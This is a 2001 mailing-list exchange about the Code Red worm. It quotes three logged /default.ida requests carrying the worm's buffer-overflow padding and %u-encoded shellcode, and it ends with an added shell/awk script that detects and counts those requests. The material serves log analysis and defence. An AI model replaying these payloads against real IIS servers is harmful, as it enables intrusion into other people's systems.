Harry Putnam wrote:
> "J. Dow" <[EMAIL PROTECTED]> writes:
>
> > {O.O} <-- Eeek, kill her in case she's contagious!
>
> Nahhh those ==> {O.O} don't look like worms. And what could someone
> that innocent looking be carrying... he he.
>
> Hey Jo, I have a scheme to bounce off you, and anybody who wants to
> add an opinion.
>
> I wanna play in this mess with my nifty log scanning tools but my
> hardware firewall just drops the connect attempts on 80. I see them
> but I don't get to see the nifty buffer overflow stuff that gets
> stuffed in. I run no web server so my hardware just drops the
> connections and reports it.
>
> Following things on comp.os.linux.security it looks like there has
> been one or several mutations that are starting to act differently.
> Reports posted there seem to indicate a general hefty increase in
> frequency like it could get really serious.
>
> Anyway, I thought about firing up my laptop, jacking into my home
> network and NATing http connects through the firewall to it.
> Fire up apache and a log catching mechanism and tinker with the show
> while it goes on. Sort of safer in that the laptop has nothing
> important on it and I could firewall it from the other two with
> iptables. Just in case newer nastier critters come into play.
>
> One problem is that the laptop is running FreeBSD (4.3) and I never
> bothered with a firewall. I know nothing about netfilter or whatever
> FreeBSD calls it. So wondered if your pet firewall (Trinity?) has a
> version for FreeBSD that sets up easily. All it would need to do is
> monitor port 80 since upstream hardware handles other trouble. Then I
> could have live action to tailor my shell/awk stuff with.
>
> And could watch the changing fortunes of `Code red' and maybe stand
> some chance of keeping up with the big boys on comp.os.linux.security
> before I get told to go to my room.

I've been getting hammered. You can see that now there is a new variation mixed
in.
Not much of a show really on Linux unless you get a kick out of watching your logs
grow huge.
GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
-Joshua
_______________________________________________
Seawolf-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/seawolf-list
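
Added example, not part of either post: a shell/awk scanner of the kind Harry describes, which picks out `/default.ida` requests like the ones Joshua pasted and groups them by padding character, so a new variation (X padding next to N padding) shows up as a separate count. The function names, the `MIN_PAD` threshold, and the sample log lines (documentation addresses, padding length 200, shortened `%u` tail) are assumptions made up for the example.

```shell
#!/bin/sh
# Added example. Flags /default.ida requests whose query is a long run of one
# padding character followed by %u-encoded data, and groups them by that character.

MIN_PAD=${MIN_PAD:-100}   # assumed threshold: shorter runs are not reported

# Constructed sample log (Apache common log format, documentation addresses).
# Padding length 200 and the shortened %u tail are made up for the demo.
sample_log() {
    n=$(printf '%200s' '' | tr ' ' N)
    x=$(printf '%200s' '' | tr ' ' X)
    enc='%u9090%u6858%ucbd3%u7801%u00=a'
    ts='[05/Aug/2001:10:00:00 -0400]'
    printf '%s\n' \
        "192.0.2.10 - - $ts \"GET /default.ida?${n}${enc} HTTP/1.0\" 404 205" \
        "192.0.2.77 - - $ts \"GET /index.html HTTP/1.0\" 200 1024" \
        "198.51.100.4 - - $ts \"GET /default.ida?${x}${enc} HTTP/1.0\" 404 205" \
        "203.0.113.9 - - $ts \"GET /default.ida?NNN HTTP/1.0\" 404 205" \
        "198.51.100.23 - - $ts \"GET /default.ida?${x}${enc} HTTP/1.0\" 404 205"
}

# stdin: access log. stdout: "<client> <pad char> <pad length>" per matching line.
classify_ida() {
    awk -v min="$MIN_PAD" '
    {
        i = index($0, "/default.ida?")
        if (i == 0) next
        q = substr($0, i + 13)            # everything after the "?"
        c = substr(q, 1, 1)
        if (c == "") next                 # empty query string
        n = 0
        while (substr(q, n + 1, 1) == c) n++
        if (n < min || substr(q, n + 1, 2) != "%u") next
        print $1, c, n
    }'
}

# stdin: access log. stdout: "<pad char> <hits>", one line per padding character.
summarize_ida() {
    classify_ida | awk '{ hits[$2]++ } END { for (c in hits) print c, hits[c] }' | sort
}

sample_log | summarize_ida
```

To run it against a real log, replace `sample_log` in the last line with `cat` of the access log in question.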